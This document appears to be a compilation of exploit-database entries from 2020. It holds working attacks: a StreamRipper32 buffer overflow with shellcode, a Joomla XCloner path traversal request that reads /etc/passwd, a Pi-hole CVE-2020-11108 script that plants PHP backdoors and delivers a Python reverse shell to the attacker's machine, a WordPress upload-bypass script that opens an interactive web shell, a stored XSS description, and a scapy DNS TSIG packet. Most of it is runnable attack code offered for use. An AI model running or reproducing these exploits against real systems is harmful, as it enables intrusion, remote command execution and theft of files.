# Exploit Title: StreamRipper32 2.6 - Buffer Overflow (PoC) # Date: 2020-05-14 # Exploit Author: Andy Bowden # Tested On: Win10 x64 # Download Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe # Vendor Page: http://streamripper.sourceforge.net/ # Version: 2.6 # Steps To Reproduce: Double click on "Add" in the"Station/Song Section" and paste the output in "SongPattern" #Bad Characters \x00\x0A\x0D file = open('exploit.txt', 'wb') buf = b"" buf += b"A" * 256 buf += b"\x47\x23\x30\x74" #74302347 buf += b"\x90" * 30 #calc payload buf += b"\xdb\xc2\xbd\x72\x07\xda\xa7\xd9\x74\x24\xf4\x58\x29" buf += b"\xc9\xb1\x31\x83\xe8\xfc\x31\x68\x14\x03\x68\x66\xe5" buf += b"\x2f\x5b\x6e\x6b\xcf\xa4\x6e\x0c\x59\x41\x5f\x0c\x3d" buf += b"\x01\xcf\xbc\x35\x47\xe3\x37\x1b\x7c\x70\x35\xb4\x73" buf += b"\x31\xf0\xe2\xba\xc2\xa9\xd7\xdd\x40\xb0\x0b\x3e\x79" buf += b"\x7b\x5e\x3f\xbe\x66\x93\x6d\x17\xec\x06\x82\x1c\xb8" buf += b"\x9a\x29\x6e\x2c\x9b\xce\x26\x4f\x8a\x40\x3d\x16\x0c" buf += b"\x62\x92\x22\x05\x7c\xf7\x0f\xdf\xf7\xc3\xe4\xde\xd1" buf += b"\x1a\x04\x4c\x1c\x93\xf7\x8c\x58\x13\xe8\xfa\x90\x60" buf += b"\x95\xfc\x66\x1b\x41\x88\x7c\xbb\x02\x2a\x59\x3a\xc6" buf += b"\xad\x2a\x30\xa3\xba\x75\x54\x32\x6e\x0e\x60\xbf\x91" buf += b"\xc1\xe1\xfb\xb5\xc5\xaa\x58\xd7\x5c\x16\x0e\xe8\xbf" buf += b"\xf9\xef\x4c\xcb\x17\xfb\xfc\x96\x7d\xfa\x73\xad\x33" buf += b"\xfc\x8b\xae\x63\x95\xba\x25\xec\xe2\x42\xec\x49\x1c" buf += b"\x09\xad\xfb\xb5\xd4\x27\xbe\xdb\xe6\x9d\xfc\xe5\x64" buf += b"\x14\x7c\x12\x74\x5d\x79\x5e\x32\x8d\xf3\xcf\xd7\xb1" buf += b"\xa0\xf0\xfd\xd1\x27\x63\x9d\x3b\xc2\x03\x04\x44" buf += b"\x90" * (1000 - len(buf)) file.write(buf) file.close()

# Exploit Title: Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated) # Date: 2020-05-10 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Exploit-Db Author ID: 8763 # Reference: https://www.xcloner.com/xcloner-news/security-release-available-for-archived-joomla-version/ # Vendor Homepage: http://www.xcloner.com # Software Link: https://www.xcloner.com/support/download/ # Version: 3.5.3 # Tested on: Kali Linux - Apache2 -------------------------------------------------------------------------------- Detail: -------------------------------------------------------------------------------- File: administrator/components/com_xcloner-backupandstore/admin.cloner.php --> ------------ case 'download': downloadBackup($_REQUEST['file']); break; ------------- downloadBackup function's file -> administrator/components/com_xcloner-backupandstore/cloner.functions.php Vulnerable parameter: file downloadBackup function's definition -------------------------------------------------------------------------------- function downloadBackup($file) { global $_CONFIG; $file = realpath($_CONFIG['clonerPath'] . "/$file"); //First, see if the file exists if (!is_file($file)) { die("<b>404 File $file was not found!</b>"); } //File Info $len = get_filesize($file); $filename = basename($file); $file_extension = strtolower(substr(strrchr($filename, "."), 1)); //Setam Content-Type-urile pentru fisierul in cauza switch ($file_extension) { default: $ctype = "application/force-download"; } smartReadFile($file, $filename); exit; } -------------------------------------------------------------------------------- and smartReadFile function's definition -------------------------------------------------------------------------------- function smartReadFile($location, $filename, $mimeType='application/octet-stream') { if(!file_exists($location)) { header ("HTTP/1.0 404 Not Found"); return; } $size=filesize($location); $time=date('r',filemtime($location)); $fm=@fopen($location,'r'); . . . -------------------------------------------------------------------------------- PoC: Request: -------------------------------------------------------------------------------- GET /joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=download&file=../../../../../../../../etc/passwd HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=view Connection: close Cookie: COOKIES Upgrade-Insecure-Requests: 1 -------------------------------------------------------------------------------- Response: -------------------------------------------------------------------------------- HTTP/1.0 200 OK Date: Sun, 10 May 2020 18:12:04 GMT Server: Apache/2.4.41 (Debian) Cache-Control: public, must-revalidate, max-age=0 Pragma: no-cache Accept-Ranges: bytes Content-Length: 3347 Content-Range: bytes 0-3347/3347 Content-Disposition: inline; filename=passwd Content-Transfer-Encoding: binary Last-Modified: Sun, 22 Mar 2020 05:41:35 -0700 Connection: close Content-Type: application/octet-stream root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync . .

# Exploit Title: Pi-hole 4.4.0 - Remote Code Execution (Authenticated) # Date: 2020-05-22 # Exploit Author: Photubias # Vendor Advisory: [1] https://github.com/pi-hole/AdminLTE # Version: Pi-hole <=4.4.0 + Web <=4.3.3 # Tested on: Pi-hole v4.4.0-g9e49077, Web v4.3.3,v4.3.2-1-g4f824be, FTL v5.0 (on Debian 10) # CVE: CVE-2020-11108 #!/usr/bin/env python3 ''' Copyright 2020 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Based (and improved on): https://github.com/Frichetten/CVE-2020-11108-PoC/blob/master/cve-2020-11108-rce.py File name CVE-2020-11108.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be ## Vulnerable setup instructions (from clean Debian 10-Buster): > apt update && apt install -y curl > curl -sSL https://install.pi-hole.net | bash > pihole checkout web release/v4.3.3 > cd /etc/.pihole/ && git checkout v4.4 > pihole -r ## Select reconfigure This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Features: * Does a reliable check before exploitation (not based on version numbers) * Performs normal RCE without Privilege Escalation (wich is more trust worthy) * Asks before running Root RCE (as this overwrites certain files) * Performs a cleanup in all cases (success / failure) ''' import urllib.request, ssl, http.cookiejar, sys, string, random import socket, _thread, time ## Default vars; change at will _sURL = '192.168.50.130' _sPASSWORD = '6DS4QtW5' _iTIMEOUT = 5 _sLOCALIP = '192.168.50.1' _sFILENAME = 'fun2.php' _sLOCALNCPORT = '4444' ## Make sure to set up a listener on this port first ## Ignore unsigned certs ssl._create_default_https_context = ssl._create_unverified_context ## Keep track of cookies between requests cj = http.cookiejar.CookieJar() oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) def randomString(iStringLength=8): sLetters = string.ascii_lowercase return ''.join(random.choice(sLetters) for i in range(iStringLength)) def postData(sURL, lData, bEncode = True): try: if bEncode: oData = urllib.parse.urlencode(lData).encode() else: oData = str(lData).encode() oRequest = urllib.request.Request(url = sURL, data = oData) return oOpener.open(oRequest, timeout = _iTIMEOUT) except: print('----- ERROR, site down?') sys.exit(1) def getEndpoint(): if not _sURL[:4].lower() == 'http': sURL = 'http://' + _sURL else: sURL = _sURL if not sURL[:-1] == '/': sURL += '/' if not '/admin' in sURL: sURL += 'admin' try: oRequest = urllib.request.Request(sURL) oResponse = oOpener.open(oRequest, timeout = _iTIMEOUT) except: print('[-] Error: ' + sURL + ' not responding') exit(1) if oResponse.code == 200: print('[+] Vulnerable URL is ' + sURL) return sURL else: print('[-] Error: ' + sURL + ' does not exist?') exit(1) def startListener(sPayload, iSockTimeout): ## Listener must always be on port 80, does not work otherwise oSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print('[!] Binding to '+_sLOCALIP+':80') oSock.bind((_sLOCALIP,80)) oSock.settimeout(iSockTimeout) oSock.listen() while True: try: oConn,sAddr= oSock.accept() except: break print('[+] Yes, we have an incoming connection from '+str(sAddr[0])) oConn.sendall(sPayload.encode()) oConn.close() break oSock.close() print('[!] Closing Listener') def doLogin(sURL, sPassword): sPath = '/index.php?login' lData = {'pw':sPassword} oResponse = postData(sURL + sPath, lData) sResult = oResponse.read().decode(errors='ignore') if 'Wrong password' in sResult: print('Wrong password') sys.exit(1) return True def getToken(sURL): sPath = '/settings.php?tab=blocklists' oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT) sResult = oResponse.read().decode(errors='ignore') if 'id=\'token\'' in sResult: return sResult.split('id=\'token\' hidden>')[1].split('<')[0] else: print('[-] Error in getting a token') sys.exit(1) def createBackdoor(sURL, sFilename): sToken = getToken(sURL) sPath = '/settings.php?tab=blocklists' lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o ' + sFilename + ' -d "', 'field':'adlists', 'token':sToken, 'submit':'save'} #lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o fun.php -d "', 'field':'adlists', 'token':sToken, 'submit':'saveupdate'} oResponse = postData(sURL + sPath, lData) if oResponse.code == 200: sResult = oResponse.read().decode(errors='ignore') arrBlocklists = sResult.split('target="_new"') sID = str(len(arrBlocklists)-2) print('[+] Creation success, ID is '+sID+'!') return sID else: return '' def doUpdate(sURL): sPath = '/scripts/pi-hole/php/gravity.sh.php' try: oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT) if oResponse.code == 200: print('[+] Update succeeded.') return True except: print('[-] Error; callback failed, maybe a firewall issue?') return False def callExploit(sURL, sFilename = _sFILENAME): sPath = '/scripts/pi-hole/php/' + sFilename print('[+] Calling ' + sURL + sPath) try: oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT) if oResponse.code == 200: print('[+] Calling exploit succeeded.') print(oResponse.read().decode(errors='ignore')) except: pass def removeEntry(sURL, sID): print('[+] Cleaning up now.') sToken = getToken(sURL) sPath = '/settings.php?tab=blocklists' lData = {'adlist-del-'+sID:'on', 'newuserlists':'', 'field':'adlists', 'token':sToken, 'submit':'save'} oResponse = postData(sURL + sPath, lData) if oResponse.code == 200: print('[+] Remove success') def main(): global _sURL, _sPASSWORD, _iTIMEOUT, _sLOCALIP, _sFILENAME, _sLOCALNCPORT if len(sys.argv) == 1: print('[!] No arguments found: python3 CVE-2020-11108.py <dstIP> <srcIP> <PWD>') print(' Example: ./CVE-2020-11108.py 192.168.50.130 192.168.50.1 6DS4QtW5') print(' But for now, I will ask questions') sAnswer = input('[?] Please enter the IP address for Pi-Hole ([' + _sURL + ']): ') if not sAnswer == '': _sURL = sAnswer sAnswer = input('[?] Please enter the your (reachable) IP address to launch listeners ([' + _sLOCALIP + ']): ') if not sAnswer == '': _sLOCALIP = sAnswer sAnswer = input('[?] Please enter the password for Pi-Hole ([' + _sPASSWORD + ']): ') if not sAnswer == '': _sPASSWORD = sAnswer else: _sURL = sys.argv[1] _sLOCALIP = sys.argv[2] _sPASSWORD = sys.argv[3] ## MAIN sURL = getEndpoint() ## Will also set the initial SessionID doLogin(sURL, _sPASSWORD) ## Creating backdoor (1) ## the old 'fun.php' sFilename = randomString() + '.php' sID = createBackdoor(sURL, sFilename) ## Launch first payload listener and send 200 OK _thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,)) if doUpdate(sURL): print('[+] This system is vulnerable!') ## Question Time sAnswer = input('Want to continue with exploitation? (Or just run cleanup)? [y/N]: ') if not sAnswer.lower() == 'y': removeEntry(sURL, sID) sys.exit(0) sAnswer = input('Want root access? (Breaks the application!!) [y/N]: ') if sAnswer.lower() == 'y': bRoot = True else: bRoot = False if bRoot: print('[!] Allright, going for the root shell') ## Launch payload listener and send root shell _sPayload = '''<?php shell_exec("sudo pihole -a -t") ?>''' _thread.start_new_thread(startListener,(_sPayload,5,)) doUpdate(sURL) ## Creating backdoor (2), overwriting teleporter.php sID2 = createBackdoor(sURL, 'teleporter.php') ## Launch payload listener for a new 200 OK _thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,)) doUpdate(sURL) input('Ok, make sure to have a netcat listener on "' + _sLOCALIP + ':' + _sLOCALNCPORT + '" ("nc -lnvp ' + _sLOCALNCPORT + '") and press enter to continue...') ## Launch shell payload listener: _sPayload = '''<?php shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'") ?> ''' %(_sLOCALIP, _sLOCALNCPORT) #_sPayload = '''<?php system($_GET['cmd']); ?>''' ## this works perfectly, but the URL is authenticated _thread.start_new_thread(startListener,(_sPayload,5,)) doUpdate(sURL) ## Launching the payload, will create new PHP file callExploit(sURL, sFilename) ## Remove entry again if bRoot: removeEntry(sURL, sID2) removeEntry(sURL, sID) if len(sys.argv) == 1: input('[+] All done, press enter to exit') if __name__ == "__main__": main()

# Exploit Title: WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution # Date: 2020-05-11 # Exploit Author: Austin Martin # Google Dork: inurl:wp-content/uploads/wp_dndcf7_uploads/ # Google Dork: inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/ # Vendor Homepage: https://www.codedropz.com/ # Software Link: https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/ # Version: 1.3.3.2 # Tested on: WordPress 5.4.1, PHP 7.41 # CVE : N/A # Notes: # At time of disclosure, the WordPress page listed this plugin being used by +10,000 applications # Application was patched by vendor within 24 hours of initial disclosure # This exploit works bypassing the allowed file types and file type sanitization. If lucky, a PHP file with a reverse shell can be uploaded and accessed # Any file types can be added to the "supported_type" parameter # These uploaded files can be accessed at wp-content/uploads/wp_dndcf7_uploads/ # Dangerous file types such as php have "_.txt" appended to the end creating a text file # This can be bypassed by adding '%' to the end of the allowed file type, and the end of the file name # ex. "php%" for file type and "shell.php%" for filename # The PHP payload in the POC can be easily modified to gain a reverse shell #!/usr/bin/python import string import random import requests from bs4 import BeautifulSoup import sys payloadurl="" def RecurseLinks(base,file): headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"} f = requests.get(base, headers=headers) soup = BeautifulSoup(f.content, "html.parser") for root in soup.find_all("a"): href = root.get("href") if (href.startswith("/")): do = "nothing" elif (href.endswith("/")): RecurseLinks(base + href, file) else: if file in href: print ("\n[+] File Found --> " + base + href) global payloadurl payloadurl = (base+href) def main(): #os.system('cls') print("WordPress Plugin \'Drag and Drop Multiple File Upload - Contact Form 7\' 1.3.3.2 - Unauthenticated Remote Code Execution") print("@amartinsec --> Twitter\nCVE:2020-12800\n") #Build The Request #Generate random URL for filename file = ''.join(random.sample((string.ascii_uppercase + string.digits), 6)) urlinput = raw_input("[+] Enter url to the vulnerable WordPress application: ") #Finding the nonce used in the Ajax security string print ("\n[+] Searching for security string nonce") headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'} homepage = requests.get(urlinput,headers=headers) homepage = homepage.text homepage = homepage.split("ajax_nonce\":\"",1)[1] securitykey = homepage[:10] print("[+] Found security string --> " + securitykey) url = urlinput + "/wp-admin/admin-ajax.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------350278735926454076983690555601", } data = "-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\n" \ "php%\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n" \ "5242880\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n" \ "dnd_codedropz_upload\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"type" \ "\"\r\n\r\nclick\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"security\"\r" \ "\n\r\n" + securitykey +"\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"upload-file\"; " \ "filename=\"" + file +".php%\"\r\nContent-Type: text/plain\r\n\r\n" \ "<?php echo shell_exec($_GET['e'].' 2>&1'); ?>" \ "\r\n-----------------------------350278735926454076983690555601--\r\n" print "\n[+] Sending payload to target" response = requests.post(url, headers=headers, data=data) if "200" in str(response): print("[+] Looks like a successful file upload!\n") elif "403" in str(response): print("\nFile Upload Failed") print("403 in response. Check security string") sys.exit(1) else: print("File upload failed. Try the manual way with Burp") sys.exit(1) print("[+] Crawling for the uploaded file. This may take a minute...") print("[+] Searching for " + file + ".php") RecurseLinks(urlinput + "/wp-content/uploads/",file) if payloadurl == "": print("Can't find the file on the web server") print("Try the manual method") sys.exit(1) #If all goes well, we can now send requests for RCE print("[+] Success\n") while True: cmd= raw_input("[+] CMD: ") headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'} request = requests.get(payloadurl + "?e=" + cmd, headers=headers) print request.text if __name__ == "__main__": main()

Exploit Title: Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2020-05-26 # Exploit Author: that faceless coder(Inveteck Global) # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: Online Marriage Registration System 1.0 - Stored Cross-Site Scripting # Tested on: MAC OS MOJAVE v 10.14.6 # CVE : N/A The Online Marriage Registration System suffers from multiple stored cross-site script vulnerabilities: if(isset($_POST['submit'])) { $nofhusband=$_POST['nofhusband']; $hreligion=$_POST['hreligion']; $haddress=$_POST['haddress']; $hstate=$_POST['hstate']; $nofwife=$_POST['nofwife']; $wreligion=$_POST['wreligion']; $waddress=$_POST['waddress']; $wstate=$_POST['wstate']; $witnessnamef=$_POST['witnessnamef']; $waddressfirst=$_POST['waddressfirst']; $witnessnames=$_POST['witnessnames']; $waddresssec=$_POST['waddresssec']; $witnessnamet=$_POST['witnessnamet']; $waddressthird=$_POST['waddressthird']; $sql="insert into tblregistration(RegistrationNumber,UserID,DateofMarriage,HusbandName,HusImage,HusbandReligion,Husbanddob,HusbandSBM,HusbandAdd,HusbandZipcode,HusbandState,HusbandAdharno,WifeName,WifeImage,WifeReligion,Wifedob,WifeSBM,WifeAdd,WifeZipcode,WifeState,WifeAdharNo,WitnessNamefirst,WitnessAddressFirst,WitnessNamesec,WitnessAddresssec,WitnessNamethird,WitnessAddressthird)values(:regnumber,:uid,:dom,:nofhusband,:husimg,:hreligion,:hdob,:hsbmarriage,:haddress,:hzipcode,:hstate,:hadharno,:nofwife,:wifeimg,:wreligion,:wdob,:wsbmarriage,:waddress,:wzipcode,:wstate,:wadharno,:witnessnamef,:waddressfirst,:witnessnames,:waddresssec,:witnessnamet,:waddressthird)"; $query=$dbh->prepare($sql); $sql="insert into tblregistration(RegistrationNumber,UserID,DateofMarriage,HusbandName,HusImage,HusbandReligion,Husbanddob,HusbandSBM,HusbandAdd,HusbandZipcode,HusbandState,HusbandAdharno,WifeName,WifeImage,WifeReligion,Wifedob,WifeSBM,WifeAdd,WifeZipcode,WifeState,WifeAdharNo,WitnessNamefirst,WitnessAddressFirst,WitnessNamesec,WitnessAddresssec,WitnessNamethird,WitnessAddressthird)values(:regnumber,:uid,:dom,:nofhusband,:husimg,:hreligion,:hdob,:hsbmarriage,:haddress,:hzipcode,:hstate,:hadharno,:nofwife,:wifeimg,:wreligion,:wdob,:wsbmarriage,:waddress,:wzipcode,:wstate,:wadharno,:witnessnamef,:waddressfirst,:witnessnames,:waddresssec,:witnessnamet,:waddressthird)"; $query=$dbh->prepare($sql); $query->bindParam(':nofhusband',$nofhusband,PDO::PARAM_STR); $query->bindParam(':hreligion',$hreligion,PDO::PARAM_STR); $query->bindParam(':hdob',$hdob,PDO::PARAM_STR); $query->bindParam(':hsbmarriage',$hsbmarriage,PDO::PARAM_STR); $query->bindParam(':haddress',$haddress,PDO::PARAM_STR); $query->bindParam(':hzipcode',$hzipcode,PDO::PARAM_STR); $query->bindParam(':hstate',$hstate,PDO::PARAM_STR); $query->bindParam(':hadharno',$hadharno,PDO::PARAM_STR); $query->bindParam(':nofwife',$nofwife,PDO::PARAM_STR); $query->bindParam(':wifeimg',$wifeimg,PDO::PARAM_STR); $query->bindParam(':wreligion',$wreligion,PDO::PARAM_STR); $query->bindParam(':wdob',$wdob,PDO::PARAM_STR); $query->bindParam(':wsbmarriage',$wsbmarriage,PDO::PARAM_STR); $query->bindParam(':waddress',$waddress,PDO::PARAM_STR); $query->bindParam(':wzipcode',$wzipcode,PDO::PARAM_STR); $query->bindParam(':wstate',$wstate,PDO::PARAM_STR); $query->bindParam(':wadharno',$wadharno,PDO::PARAM_STR); $query->bindParam(':witnessnamef',$witnessnamef,PDO::PARAM_STR); $query->bindParam(':waddressfirst',$waddressfirst,PDO::PARAM_STR); $query->bindParam(':witnessnames',$witnessnames,PDO::PARAM_STR); $query->bindParam(':waddresssec',$waddresssec,PDO::PARAM_STR); $query->bindParam(':witnessnamet',$witnessnamet,PDO::PARAM_STR); $query->bindParam(':waddressthird',$waddressthird,PDO::PARAM_STR); $query->execute(); $LastInsertId=$dbh->lastInsertId(); if ($LastInsertId>0) { echo '<script>alert("Registration form has been filled successfully.")</script>'; } else { echo '<script>alert("Something Went Wrong. Please try again")</script>'; } The data gets stored through the mentioned vulnerable parameters into the database. There is no filtering when those values are printed when the web application fetches the data from the database

#!/usr/bin/python #coding:utf-8 from scapy.all import DNS, DNSQR, IP, sr1, UDP, DNSRRTSIG, DNSRROPT tsig = DNSRRTSIG(rrname="local-ddns", algo_name="hmac-sha256", rclass=255, mac_len=0, mac_data="", time_signed=0, fudge=300, error=16) dns_req = IP(dst='127.0.0.1')/UDP(dport=53)/DNS(rd=1, ad=1, qd=DNSQR(qname='www.example.com'), ar=tsig) answer = sr1(dns_req, verbose=0) print(answer[DNS].summary())